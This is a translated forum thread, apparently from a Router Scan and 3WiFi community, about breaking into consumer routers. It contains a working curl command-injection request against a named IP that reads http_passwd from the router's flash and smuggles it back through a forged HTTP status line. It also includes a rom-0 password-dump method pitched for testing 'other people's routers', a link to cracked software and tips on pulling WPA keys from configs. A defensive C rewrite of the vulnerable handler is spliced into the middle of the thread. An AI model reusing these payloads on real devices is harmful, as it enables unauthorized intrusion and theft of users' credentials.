I looked at the firmware; loosely paraphrased, it looks like this:

Spoiler: Command execution
Code:
    cmd_tmpl = "/www/cgi-bin/%s > /tmp/cgi_result";
    sprintf(cmd, cmd_tmpl, cgi_name);
    system(cmd);

Spoiler: Building the response
Code:
    fid_res = fopen("/tmp/cgi_result", "r");
    if ( fid_res )
    {
      while ( fgets(line, 0xFFFF, fid_res) )
      {
        p_status_start = strstr(line, "Status:");
        if ( p_status_start )
        {
          strcpy(status, p_status_start + 7);
          p_status_end = strchr(status, 10);
          if ( p_status_end )
            *p_status_end = 0;
          sprintf(http_hdr, "HTTP/1.1%s\r\n", status);
        }
        else
        {
          strcat(http_hdr, line);
        }
      }
      fclose(fid_res);
    }
    strcat(http_hdr, "\r\n");
    send_pkt(v5, http_hdr, strlen(http_hdr), 0);

I changed the request accordingly:
Code:
    curl 'https://97.94.205.2l:8443/cgi-bin/;echo$IFS-e$IFS"Status:\x20200\x20OK\r\n\r\n"`grep$IFS-m1$IFS"http_passwd"$IFS$PWD"dev"$PWD"mtd1"`' -k

Now I need to figure out how to cram all of this (especially the \r\n in the request) into a Router Scan exploit. It would all be fine if not for the additional SSL layer (https/8443).
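A hardened counterpart to the handler paraphrased in the post above, as an added example (not code from the firmware or from the poster): the CGI name is checked against an allowlist and executed without a shell, and the status line is built with bounded writes. The function names, the 64-byte limit and the allowed character set are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example: names, the 64-byte limit and the allowlist are assumptions. */
static const char OK_CHARS[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_.-";

/* Accept only a plain file name: allowlisted bytes, no leading dot, bounded. */
int cgi_name_is_safe(const char *name)
{
    size_t n = strlen(name);
    return n > 0 && n <= 64 && name[0] != '.' && strspn(name, OK_CHARS) == n;
}

/* Run <cgi_dir>/<name> with stdout redirected to out_path; no shell is involved.
 * Returns the child's exit status, or -1 if the name is rejected or a call fails. */
int run_cgi(const char *cgi_dir, const char *name, const char *out_path)
{
    char path[256];
    int status;
    if (!cgi_name_is_safe(name))
        return -1;
    int len = snprintf(path, sizeof path, "%s/%s", cgi_dir, name);
    if (len < 0 || (size_t)len >= sizeof path)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                      /* child */
        int fd = open(out_path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
        if (fd < 0 || dup2(fd, STDOUT_FILENO) < 0)
            _exit(127);
        char *argv[] = { path, NULL };
        execv(path, argv);               /* the name is a path, never shell text */
        _exit(127);                      /* reached only if execv failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Bounded replacement for the strcpy/sprintf pair that builds the status line.
 * Returns 0 on success, -1 if there is no "Status:" or the result does not fit. */
int build_status_line(const char *line, char *out, size_t outsz)
{
    const char *p = strstr(line, "Status:");
    if (!p)
        return -1;
    size_t n = strcspn(p + 7, "\r\n");   /* stop at the first CR or LF */
    int len = snprintf(out, outsz, "HTTP/1.1%.*s\r\n", (int)n, p + 7);
    return (len < 0 || (size_t)len >= outsz) ? -1 : 0;
}
```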
Ask us to add support for the router, after first following the whole request-submission procedure (bearing in mind that the router is most likely reachable only by you and not from outside). This is beyond the scope of this thread; write to 3WiFi.
I came across this:
"TP-Link and Zyxel have a vulnerability. Through this bug the file with the passwords can be pulled remotely. A script for testing routers: https://github.com/MrNasro/zynos-attacker/ With it you can test your own and other people's routers.
Testing for the bug:
1) Open http://rom-0.cz/index/ and check your modem
2) To check manually, append /rom-0 to the end of the IP, for example 192.168.1.1/rom-0
3) Decode the downloaded file here: http://www.routerpwn.com/zynos/"
Has anyone tried this, and can these vulnerabilities be tied into RS?
A topic about this came up on the forum some time ago. Maybe someone needs Charles (not our gurus, of course; they have had everything set up and working for a long time). I came across version 3.11.2 with a crack on rutor org. It seems to work: http://rutracker.org/forum/viewtopic.php?t=2114687
Interesting defaults for some routers. There are some that are fairly rarely encountered.
Link: https://www.facebook.com/permalink.php?story_fbid=10152108647168705&id=1414817015437518
I haven't really figured out what's what yet. I'd be glad if anyone shares an opinion. I have a vague suspicion that this guy is connected to the hacking group Moroccan Military. They shared the information, so to speak.
It doesn't read the passwords. Everything is there except the passwords. They can be pulled out through the config, though. The line is WLAN_WPA_PSK. Spoiler: Realtek
What I'm missing in RS is external modules. For example, we write a console application in any language for some specific vulnerability. The input is the IP in ParamStr(1); on success the output is a CSV in an exchange folder, and RS checks this folder once a minute for new files and picks up the data from it. As for launching... well, filters could somehow be bolted on for that. We get extensibility and get away from the hard tie to HTTP.
And on top of that, 100% CPU load, even on a multi-core processor, on "dense" ranges. This concerns the creation of many copies of additional processes. Fixed it.
Yes, you are probably right, but external processes can be launched within overall limits. There is some hassle with tracking their completion, but that is all quite solvable. Then again, you know best. P.S. And a link to the fix?